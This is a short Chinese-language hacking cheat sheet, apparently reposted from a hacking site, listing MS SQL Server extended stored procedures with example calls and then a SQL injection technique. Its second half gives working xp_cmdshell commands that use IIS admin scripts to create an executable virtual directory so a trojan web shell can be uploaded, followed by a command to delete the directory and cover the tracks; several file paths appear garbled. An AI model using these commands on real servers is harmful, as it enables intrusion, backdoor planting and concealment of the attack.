xp_availablemedia 显示系统上可用的盘符''C:'' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree ''C:inetpubwwwroot''
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails ''C:inetpubwwwroot.asp''
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab ''C:lin.cab'',''evil'',1,''C:inetpubmdb.asp''
xp_unpackcab 解压缩 xp_unpackcab ''C:hackway.cab'',''C:temp'',1
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol ''stop'',''schedule''
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs ''C:''

对绝对路径的判断
在注射存在的情况先，很多时候我们想用backup web shell来弄一个网页后门来更方便操作，可惜绝对路径很多时候难以判断！
exec master.dbo.xp_cmdshell ''cscript C:\Inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "1" -v "win","c:\winnt\"''
这样就在默认的web服务器下面建立了一个虚拟目录win并且指向物理路径为C:\winnt\ ，权限不够，继续：
exec master.dbo.xp_cmdshell ''cscript C:\Inetpub\AdminScripts/adsutil.vbs set w3svc/1/root/win/AccessExecute True''
现在你就可以使用备份数据库或者使用sp_makewebtask存储扩展的方法上传木马文件
成功以后当然要擦PP地：
exec master.dbo.xp_cmdshell ''cscript C:\Inetpub\AdminScripts/adsutil.vbs delete w3svc/1/root/win/''

文章转载地址：http://www.cnpaf.net/Class/hack/05121820345287856680.htm